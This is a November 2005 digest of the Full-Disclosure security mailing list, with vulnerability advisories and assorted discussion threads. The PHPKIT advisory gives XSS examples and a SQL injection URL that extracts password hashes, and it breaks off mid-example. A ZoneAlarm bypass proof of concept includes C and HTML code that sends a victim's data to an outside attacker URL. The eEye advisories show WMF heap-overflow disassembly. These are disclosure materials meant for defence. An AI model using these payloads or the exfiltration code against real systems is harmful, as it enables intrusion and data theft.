[Full-disclosure] Advisory 21/2005: Multiple vulnerabilities in PHPKIT

2005-11-08 Thread Christopher Kunz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Hardened PHP Project
www.hardened-php.net

  -= Security  Advisory =-


 Advisory: Multiple vulnerabilities in PHPKIT
 Release Date: 2005/11/07
Last Modified: 2005/11/04
   Author: Christopher Kunz [EMAIL PROTECTED]
  Application: PHPKIT 1.6.1 R2 and prior
 Severity: Cross-Site Scripting, SQL injection and information
   disclosure, password hash disclosure, local file
   disclosure, arbitrary code execution
 Risk: High / Critical (depending on server configuration)
Vendor Status: No fix available
   References: http://www.hardened-php.net/advisory_212005.80.html


Overview:

   PHPKIT [1] is a combined content management, homepage building and community
   software written in PHP. Although it is available as open source, it has
   to be licensed for any other than private use. PHPKIT has the usual feat-
   ures for that kind of product (content editing, forums, user management,
   etc.). Typically for content management and portal systems, there are
   multiple vulnerabilities in several places in the front- and backend.
   The install base for PHPKIT can only be estimated - Google shows about
   25,000 results for the query powered by phpkit [2].
   Since we did not perform a full audit, there is no guarantee that the de-
   scribed vulnerabilities are the only ones in the product.


Details:

   1) XSS
  Although the PHPKIT team seems to have made an effort to mitigate attacks
  with cross-site scripting, this was only partially successful. We found
  a number of critical XSS holes that can be exploited by any third party
  to steal admin cookies, change HTML code, launch CSRF attacks and so on.

   1.1) login/profile.php and login/userinfo.php
Two fields in the profile settings - those for AIM and Yahoo! screen
names - are inserted into the database without any input validation.
Thus, an XSS attack can be performed that is launched on any user who
looks at the offending profile.
The same attack can be launched on an administrator viewing a profile
via the administrator back-end.

   1.2) admin/admin.php (with register_globals On)
Since the variable $site_body is not properly initialized, an attacker
can launch an XSS attack against the administrator login screen. This
attack can utilize DOM to steal the administrator's credentials in
cleartext as long as they have some kind of password safe function
in their browser. Since script code can be executed on load, all that
an attacker has to do is get the administrator to click on a manipula-
ted link.

   1.3) Referrer statistics
By launching a HTTP request with the Referer set to some script code,
e.g. scriptalert('foo')/script, an attacker prompts this code to
be included in the administrative backend, and executed as soon as
an administrator views the referrer statistics. This comes in handy
since it is a quasi-anonymous way of obtaining the administrator's
session cookies.

   1.4) Forum
Although input filtering takes place in the subject and content of
a forum postings, no such filtering is performed when constructing
the HTML title tag and the logo's img alt attribute - both con-
tain the thread subject in unfiltered HTML, and script code is execu-
ted twice per page.

   1.5) imcenter.php
PHPKIT's own instant messaging system does not perform input validation
on the subject line, so any user can IM the admin and contain script
code in the subject.

   1.6) Guestbook
The Homepage input field in the guest book is not properly sanitized
and any guest (no logged-in users, because their home page is not dis-
played by default) can enter script code. As usual, this is displayed
as soon as the guestbook is viewed.

   2) SQL Injection
  Same as above: Although many places inside the PHPKIT software are not
  prone to SQL injection, some are. This leads to information disclosure
  and possibly deletion of arbitrary data in the database.

   2.1) SQL injection in profile pages (with magic_quotes_gpc Off)
Using a simple injection, any user of the PHPKIT-powered web site can
disclose the administrator's password hash. This is done via the $id
parameter in login/userinfo.php which is not properly sanitized. With
a crafted UNION statement, the attacker can obtain arbitrary data, in-
cluding but not limited to any user's password hash. A simple cast into
an int would have prevented this problem.
Example: include.php?path=login/userinfo.phpid='%20UNION%20SELECT%201,
1,user_pw,1,1,1,1,1,1,1,1,1,1,1,1,user_pw,1,1,1,1,1,1,1,1,1,1,1,1,1,1,

Re: [Full-disclosure] Re: readdir_r considered harmful

2005-11-08 Thread Casper . Dik

In practice, you're correct. In theory, however, consider the  
following code
path.


 THREAD 1  THREAD 2
 ----
 DIR *d1 = opendir(dir1);
   DIR *d2 = opendir(dir2);
 dent1 = readdir(dir1);
   dent2 = readdir(dir2);
 use(dent1);


In most implementations, dent1 != dent2. HOWEVER, there is no  
guarantee that
they will not both point to the same statically allocated buffer, and  
some
implementations may do so. For example, this is why ctime_r exists:  
ctime
returns a pointer to a statically allocated buffer, and hence is not  
thread
safe.

The standard actually guarantees that the static storage is
associated with the specific directory STREAM.  So a system on which
dent1 and dent2 point to the same buffer and reads from one stream
affect the buffer returned by reads from another stream are not
POSIX compliant.

See:

http://www.opengroup.org/onlinepubs/009695399/functions/readdir.html

The pointer returned by readdir() points to data which may be
overwritten by another call to readdir() on the same directory
stream. This data is not overwritten by another call to readdir()
on a different directory stream.

But is also goes on to say:

The readdir() function need not be reentrant. A function that is
not required to be reentrant is not required to be thread-safe.

which is the one thing I like POSIX to fix for thread safe implementations.

Casper
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Re: [OTAnn] Feedback

2005-11-08 Thread Dave Korn

shenanigans wrote in 
news:[EMAIL PROTECTED]
 I was interested in getting feedback from current mail group users.

 We have mirrored your mail list in a new application that provides a more
 aggregated and safe environment which utilizes the power of broadband.

  Utilizes the power of broadband?  What a heap of marketing wankspeak!

 Roomity.com v 1.5 is a web 2.01 community webapp. Our newest version adds
 broadcast video and social networking such as favorite authors and an
 html editor.

 It?s free to join and any feedback would be appreciated.

 S.

http://Full_Disclosure_Security_Discussion_List.roomity.com/ says:
quote
 Your Firefox browser may not be set up correctly or it may need the 
required plugin. Please click support to configure your browser or find out 
what browsers we support and how.Support Page. If support page is not 
helpful please contact us
end quote

  So I go look at the support page, and it's full of download this, run 
that, allow the other to install, open holes in your firewall, all in order 
to allow what it persists in describing as your broadband webapp.  As if 
the app is in someway related to the kind of cable that carries the traffic.

  Sorry, no way on earth am I gonna run your wretched java virus/trojan just 
in order to get the opportunity to have marketing bullshit rammed down my 
throat.  It's utter GARBAGE to claim that installing some completely unknown 
java application is somehow a safe environment compared to reading plain 
text emails.

cheers,
  DaveK
-- 
Can't think of a witty .sigline today 



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [OTAnn] Feedback

2005-11-08 Thread Michael Holstein

It?s free to join and any feedback would be appreciated.


You might have had more luck posting it to vulnerable-idiots list 
rather than a security related one. Nobody's going to run your untrusted 
Java app and open their firewall.


Better bet we'll download it and pick it apart though. Hope for your 
sake you secured your side better than you wrote this app.


And BTW : I like the text based FD digests just fine.

~Mike.

PS: anyone notice this one :

Windows is the operating system on 98% of all PC's

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RE: [Full-disclosure] [OTAnn] Feedback

2005-11-08 Thread Todd Towles
 
Mike said:
 You might have had more luck posting it to 
 vulnerable-idiots list rather than a security related one. 
 Nobody's going to run your untrusted Java app and open their firewall.
 
 Better bet we'll download it and pick it apart though. Hope 
 for your sake you secured your side better than you wrote this app.
 
 And BTW : I like the text based FD digests just fine.

Mike, you don't want to get the filtered e-mail list with a lot of ads?
Can't believe you are going to pass that up. Why would you mirror FD on
a safe app anyways...does he not see all the exploits and malware that
is exposed on this list. Why give it to people that don't understand it?

-Todd
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Zone Labs Products Advance Program Control and OS Firewall (Behavioral Based) Technology Bypass Vulnerability

2005-11-08 Thread Bipin Gautam
Debasis,
i'll see the POC; but seems like finally you did it... after our last
discussion i was trying to kick some nasm code to do the same. good
finding!@




On 11/8/05, Debasis Mohanty [EMAIL PROTECTED] wrote:
 Zone Labs Products Advance Program Control and OS Firewall (Behavioral
 Based) Technology Bypass Vulnerability


 I.  PRODUCT BACKGROUND
 ZoneAlarm Pro and Internet Security Suite with its a new level of protection
 is what Zone Labs calls an OS Firewall based on Behavior Based Analysis
 has gone beyond network level protection and protects PCs against various
 local attacks on a windows machine. Currently available personal firewalls
 protects PCs against only network based attacks however the new Zone Labs
 OS firewall technology monitors activity at the kernel-level and prevents
 attacks at various level. The new approach alerts the user by closely
 monitoring at kernel level for any unusual activity in the system; like
 changes in critical registry keys, changes in start-up entries, any kind of
 Interprocess interactions and processes making outbound connections via
 other trusted programs. When ZoneAlarm sees unusual activity between
 applications, it can put the kibosh on memory being read, or quash
 unauthorized driver and service loading. The PoC below discusses how the
 ZoneAlarm Advance Program Control and Behavior Based Technology can be
 defeated by using HTML Modal Dialog Box.

 II. TECHNICAL DESCRIPTION
 Zone Alarm products with Advance Program Control or OS Firewall Technology
 enabled, detects and blocks almost all those APIs (like Shell,
 ShellExecuteEx, SetWindowText, SetDlgItem etc) which are commonly used by
 malicious programs to send data via http by piggybacking over other trusted
 programs. However, it is still possible for a malicious program (Trojans or
 worms etc) to make outbound connections to the evil site by piggybacking
 over trusted Internet browser using HTML Modal Dialog in conjunction with
 simple JavaScript. Here it is assumed that the default browser (IE or
 Firefox etc) has authorization to access internet. In case of the default
 installation of ZoneAlarm Pro, IE is by default allowed to access internet.
 The PoC (Proof-of-Concept) in Section V explains the hack and the exploit
 code is also included for reference.

 III.IMPACT
 On successful exploitation the malicious program will be able to send the
 victim's details and personal system information to the attacker and this
 can further leads to complete system compromise.

 IV. AFFECTED PRODUCTS
 Zone Alarm Pro 6.0.x
 Zone Alarm Internet Security Suit 6.0.x
 Zone Alarm Firewall with Anti-Spyware 6.1.x
 Zone Alarm Firewall with Anti-Virus 6.0.x
 Zone Alarm Firewall (Free Version) 6.0.x


 V.  PROOF-OF-CONCEPT:
 By using ShowHTMLDialog() method, it is possible for any malicious program
 to creates a modal dialog box that displays HTML. This in turn can be used
 to redirect the page to the attacker's site. It is observed that using this
 method, ZA Pro and Internet Security Suit is unable to block internet
 access. This method can be used by any malicious program to send data
 outside via http to the attacker and at the same time it can also receive
 the command instructions from the attacker. The detailed exploit code is
 given below:

  osfwbypass-demo.c 

 BOOL LoadHtmlDialog(void)
 {
 HINSTANCE hinstMSHTML = LoadLibrary(TEXT(MSHTML.DLL));

 if (hinstMSHTML)
 {
 SHOWHTMLDIALOGFN* pfnShowHTMLDialog;

 // Open a Modal Dialog box of HTML content type
 pfnShowHTMLDialog = (SHOWHTMLDIALOGFN*)GetProcAddress(hinstMSHTML,
 TEXT(ShowHTMLDialog));

 if (pfnShowHTMLDialog)
 {
 IMoniker *pURLMoniker;

 // Invoke the html file containing the data to be sent via http
 BSTR bstrURL = SysAllocString(Lc:\\modal-dialog.htm);
 CreateURLMoniker(NULL, bstrURL, pURLMoniker);

 if (pURLMoniker)
 {
 (*pfnShowHTMLDialog)(NULL, pURLMoniker, NULL, NULL, NULL);
 pURLMoniker-Release();
 }

 SysFreeString(bstrURL);
 }

 FreeLibrary(hinstMSHTML);
 }

 Return True;
 }

  +++ 


  modal-dialog.htm 
 html
 head
 meta http-equiv=Content-Language content=en-us
 titleRedirection Dialog/title

 script language=JavaScript

 !--  Here goes the information logged by the malicious program which will
 be sent to the evil site via http request --
 var sTargetURL =
 http://www.hackingspirits.com/vuln-rnd/demo/defeat-osfw.asp?[Your
 Information Here]
 window.location.href = sTargetURL;
 window.close;
 /script

 /head
 /html
  +++ 

 VI. DEMONSTRATION:
 For a live demonstration, the compiled binary (osfwbypass-demo.exe) and
 the html redirection script (modal-dialog.htm) has been enclosed with this
 advisory. To test, kindly follow the following steps:

 a.  Extract both osfwbypass-demo.exe and modal-dialog.htm to C:\.
 [Note: You can extract osfwbypass-demo.exe to whatever location you like
 but don't change the location of modal-dialog.htm other than C:\
 otherwise the PoC won't work.] - Just to save time, I had to 

[Full-disclosure] [EEYEB-20050901] Windows Metafile SetPalette Entries Heap OVerflow Vulnerability (Graphics Rendering Engine Vulnerability)

2005-11-08 Thread Advisories
Windows Metafile SetPalette Entries Heap OVerflow Vulnerability
(Graphics Rendering Engine Vulnerability)

Release Date:
November 8, 2005

Date Reported:
September 1, 2005

Severity:
High (Code Execution)

Vendor:
Microsoft

Systems Affected:
Windows 2000
Windows XP SP0, SP1
Windows Server 2003 SP0

Overview:
eEye Digital Security has discovered a vulnerability in the way the
Windows Graphical Device Interface (GDI) processes Windows Metafile
(WMF) format image files that would allow arbitrary code execution as a
user who attempts to view a malicious image.  An attacker could send
such a metafile to a victim of his choice over any of a variety of
attack vectors, including an HTML e-mail, a link to a web page, a
metafile-bearing Microsoft Office document, or a chat message.

Technical Details:
The code in GDI32.DLL responsible for rendering Windows Metafiles
contains an integer overflow vulnerability in the function
PlayMetaFileRecord, cases 36h and 37h, which handle
SetPaletteEntries-type records.  If the reported length of such a
record is 7FFFh or h, the following code will experience an
integer overflow and can be made to allocate an insufficient heap block,
the success of which incorrectly implies the validity of the length:

77F5BC38mov eax, [ebx] ; length field
77F5BC3Alea eax, [eax+eax+2]   ; *** integer overflow ***
77F5BC3Epusheax
77F5BC3Fpushedi
77F5BC40callds:LocalAlloc
 ...
77F5BC51mov ecx, [ebx] ; length field
77F5BC53add eax, 2
77F5BC56shl ecx, 1 ; copy size != allocation
size
77F5BC58mov edx, ecx   ; intrinsic memcpy() follows
77F5BC5Amov esi, ebx
77F5BC5Cmov edi, eax
77F5BC5Eshr ecx, 2
77F5BC61rep movsd
77F5BC63mov ecx, edx
77F5BC65and ecx, 3
 ...
77F5BC6Drep movsb

Although the copy length is similarly subject to an integer overflow,
the two differ by a +2 term, and therefore the allocation size can be
made very small while keeping the copy length extremely large.  The
result is a complete heap overwrite with arbitrary binary data from the
metafile.

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.
Blink Endpoint Protection proactively protects users from this
vulnerability.

Vendor Status:
Microsoft has released a patch for this vulnerability. The patch is
available at:
http://www.microsoft.com/technet/security/bulletin/MS05-053.mspx

Credit:
Fang Xing

Related Links:
This vulnerability has been assigned the following IDs;

EEYEB-20050901
OSVDB ID: 
CVE ID: CAN-2005-2123

Greetings:
Thanks Derek and and eEye guys help me wrote this advisory. Greeting
xfocus guys and venustech lab guys.

Copyright (c) 1998-2005 eEye Digital Security
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of this
alert in any other medium excluding electronic medium, please email
[EMAIL PROTECTED] for permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are no warranties, implied or express, with regard to this information.
In no event shall the author be liable for any direct or indirect
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [EEYEB-20050329] Windows Metafile Multiple Heap Overflows

2005-11-08 Thread Advisories
Windows Metafile Multiple Heap Overflows

Release Date:
November 8, 2005

Date Reported:
March 29, 2005

Severity:
High (Code Execution)

Vendor:
Microsoft

Systems Affected:
Windows 2000
Windows Server 2003

Overview:
eEye Digital Security has discovered a heap overflow vulnerability in
the way the Windows Graphical Device Interface (GDI) processes Windows
enhanced metafile images (file extensions EMF and WMF).  An attacker
could send a malicious metafile to a victim of his choice over any of a
variety of media -- such as HTML e-mail, a link to a web page, a
metafile-bearing Microsoft Office document, or a chat message -- in
order to execute code on that user's system at the user's privilege
level.

Technical Details:
The Windows metafile rendering code in GDI32.DLL contains a number of
integer overflow flaws in its processing of EMF/WMF file data that lead
to exploitable heap overflows through any number of specially crafted
metafile structures.  For example, the following disassembly from
MRBP16::bCheckRecord demonstrates a size calculation that is susceptible
to integer overflow and as a result may pass validation with a dangerous
value:

77F6C759mov edx, [ecx+18h]; malicious count (e.g.,
800Dh)
77F6C75Cmov eax, [ecx+4]  ; heap allocation size
 ...
77F6C764lea edx, [edx*4+1Ch]  ; EDX = 3FF9h: integer
overflow
77F6C76Bcmp edx, eax  ; validation check
77F6C76Djnz 77F6C77F

Protection:
Retina Network Security Scanner has been updated to identify this
vulnerability.
Blink Endpoint Protection proactively protects users from this
vulnerability.

Vendor Status:
Microsoft has released a patch for this vulnerability. The patch is
available at:
http://www.microsoft.com/technet/security/bulletin/MS05-053.mspx

Credit:
Fang Xing

Related Links:
This vulnerability has been assigned the following IDs;

EEYEB-20050329
OSVDB ID: 18820
CVE ID: CAN-2005-2124

Greetings:
Thanks Derek and and eEye guys help me wrote this advisory. Greeting
xfocus guys and venustech lab guys.


Copyright (c) 1998-2005 eEye Digital Security Permission is hereby
granted for the redistribution of this alert electronically. It is not
to be edited in any way without express consent of eEye. If you wish to
reprint the whole or any part of this alert in any other medium
excluding electronic medium, please email [EMAIL PROTECTED] for permission.

Disclaimer
The information within this paper may change without notice. Use of this
information constitutes acceptance for use in an AS IS condition. There
are no warranties, implied or express, with regard to this information.
In no event shall the author be liable for any direct or indirect
damages whatsoever arising out of or in connection with the use or
spread of this information. Any use of this information is at the user's
own risk.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Re: Security Updates Without Rebooting

2005-11-08 Thread Tomasz Nidecki
-BEGIN PGP SIGNED MESSAGE-
Hash: MD5

Tuesday, November 8, 2005, 2:48:28 AM, Valdis wrote:

 Or, if you're able to identify I only applied an Apache patch, you may very
 well be able to only restart that one service.  For RedHat/Fedora systems,
 you'd do this with 'service httpd restart' (or replace httpd with the name
 of the /etc/init.d script that starts/stops the service in question). For
 other systems, you should be able to find a similar stop then restart for
 the specific daemon in question.

Well, if I could make a small suggestion, I never use the /etc/rc.d or
/etc/init.d scripts on my servers. I have long ago switched to
daemontools - http://cr.yp.to/daemontools.html [there are similar
solutions for those who don't like daemontools, eg. a very similar one
called runit - http://smarden.org/runit/]. There are a couple of
security and ease-of-use reasons to do that:

* a service such as daemontools or runit will make sure your service
is running even if something causes it to fail temporarily, as it
monitors the service every second and restarts it if necessary

* for every service monitored all I need to do to restart it after
a security update is svc -t /service/servicename.

Obviously, RPMs will not restart such services, so this is a drawback,
but I find this a very good, platform-independent [eg. some
distributions use the SysV scripts, some use other solutions] method
to control services that also makes sure for me that the service is
always running.

The drawback is the fact that not all services can be run in the
foreground [this is required for daemontools/runit] and that writing
your own run scripts might sometimes be difficult [but the runit page
contains a bunch of ready-made run scripts for most popular services].

- --
Tomasz Nidecki, Sekr. Redakcji / Managing Editor
hakin9 magazinehttp://www.hakin9.org
mailto:[EMAIL PROTECTED]  jid:[EMAIL PROTECTED]

Do you know what hacker means?
http://www.catb.org/~esr/faqs/hacker-howto.html

Czy wiesz, co znaczy slowo haker?
http://www.jtz.org.pl/Inne/hacker-howto-pl.html

-BEGIN PGP SIGNATURE-
Version: 2.6

iQCVAwUAQ3Cp10R7PdagQ735AQHllwP/Z1WjjO/dD2T8KWGJy6h1vJ4p3YTVfImE
G3iXFv2mI9yrQA2TngNQsmZVvSTAhTxFRf3B9mctWZnbYbc80WA7qObt3OhzViB4
TXm/DeiJRsfIZz7+N2aUZmfZckIaRbiKpe/Gpi31bT8/qbLFYvN2vj0pxxdWOvhS
B5njPTCWG7I=
=5G0b
-END PGP SIGNATURE-


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Digg dot com

2005-11-08 Thread n3td3v
Hi security community,

Ground breaking research http://digg.com/security/Dugging_on_Digg ;-)

Think Myspace... get researching.

Thanks, n3td3v
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RE: [Full-disclosure] Securtiy Contact for Avast, Symantec and AvG please

2005-11-08 Thread ad
If I rmember, for symantec there is also [EMAIL PROTECTED], cheers man ;)

-Message d'origine-
De : [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] De la part de Thierry
Zoller
Envoyé : mardi 8 novembre 2005 19:45
À : full-disclosure@lists.grok.org.uk
Objet : [Full-disclosure] Securtiy Contact for Avast,Symantec and AvG please



If you care and you read this list get in touch with me.

AVG - No I will not send you my license number prior to doing research
  for you...
Symantec - twice at [EMAIL PROTECTED] should be enough no ?
Avast -

http://secdev.zoller.lu

-- 
Thierry Zoller


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RE: [Full-disclosure] Securtiy Contact for Avast, Symantec and AvG please

2005-11-08 Thread Juha-Matti Laurio

Yes, they list [EMAIL PROTECTED] as an official address:

 Responsible security researchers work with the Symantec Product 
Security team through the email address [EMAIL PROTECTED]

http://securityresponse.symantec.com/security/

- Juha-Matti


If I rmember, for symantec there is also [EMAIL PROTECTED], cheers man ;)

-Message d'origine-
De : [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] De la part de Thierry
Zoller
Envoyé : mardi 8 novembre 2005 19:45
À : full-disclosure@lists.grok.org.uk
Objet : [Full-disclosure] Securtiy Contact for Avast,Symantec and AvG please



If you care and you read this list get in touch with me.

AVG - No I will not send you my license number prior to doing research
  for you...
Symantec - twice at [EMAIL PROTECTED] should be enough no ?
Avast -

http://secdev.zoller.lu

--
Thierry Zoller


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] MDKSA-2005:206 - Updated openvpn packages fix multiple vulnerabilities

2005-11-08 Thread Mandriva Security Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2005:206
 http://www.mandriva.com/security/
 ___
 
 Package : openvpn
 Date: November 8, 2005
 Affected: Multi Network Firewall 2.0
 ___
 
 Problem Description:
 
 Two Denial of Service vulnerabilities exist in OpenVPN.  The first
 allows a malicious or compromised server to execute arbitrary code
 on the client (CVE-2005-3393).  The second DoS can occur if when in
 TCP server mode, OpenVPN received an error on accept(2) and the
 resulting exception handler causes a segfault (CVE-2005-3409).
 
 The updated packages have been patched to correct these problems.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3393
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3409
 ___
 
 Updated Packages:
 
 Multi Network Firewall 2.0:
 6d05d03341ef7c99bd0c044ac14383c7  
mnf/2.0/RPMS/openvpn-2.0.1-0.2.M20mdk.i586.rpm
 8882e7500e1fb8a255f5f50885042608  
mnf/2.0/SRPMS/openvpn-2.0.1-0.2.M20mdk.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFDcSaomqjQ0CJFipgRAqpcAKCm5jQa0I3yoYNq2KF/IfE0ygaTdwCgrYlc
CH/Ar8bO2UfJ3ciAqdY9jz0=
=IPL2
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] sugget a small pentest distro

2005-11-08 Thread crazy frog crazy frog
Hi,
can anyone suggest a small pentest liux distro.smallest means(under
250 mb.),i seen one on whax site.has any one used it?
no google please
--
ting ding ting ding ting ding
ting ding ting ding ding
i m crazy frog :)
oh yeah oh yeah...
 another wannabe, in hackerland!!!
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] sugget a small pentest distro

2005-11-08 Thread John Smith

I like knoppix STD, it fits on a CD, but hasn't been updated in sometime.

First hit on google for live linux cds

http://www.frozentech.com/content/livecd.php?pick=Allshowonly=security

I even narrowed it down to the security section for your lazy ass.

crazy frog crazy frog wrote:

Hi,
can anyone suggest a small pentest liux distro.smallest means(under
250 mb.),i seen one on whax site.has any one used it?
no google please
--
ting ding ting ding ting ding
ting ding ting ding ding
i m crazy frog :)
oh yeah oh yeah...
 another wannabe, in hackerland!!!
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] sugget a small pentest distro

2005-11-08 Thread Valdis . Kletnieks
On Wed, 09 Nov 2005 12:41:41 +0530, crazy frog crazy frog said:
 i know ab tlal thjose distros auditor,phlak,whax etc but what i want
 is a distro whose size is much smaller among this distros.

So take one of those distros and heave stuff over the side until you get
it small enough. Note that there's only 2 constraints - the 650-700M that
will fit on a standard CD, and the 250M or so that you can fit onto one
of the credit card sized chopped-down CDs.

The distinction only matters if the pen test assumes that you can sneak
a cut-down CD onto the site, but can't find a way to get a regular CD onto
the site (if all else fails, buy a portable CD player, scribble My Fave Metal
on your pen-test disk, and see if you can social-engineer it past the guard.

If you're *really* good, you can even burn it so the CD player will see
3 or 4 good metal cuts, so you can crank it up and prove it's a music CD. ;)


pgpwSTdEK1G1M.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/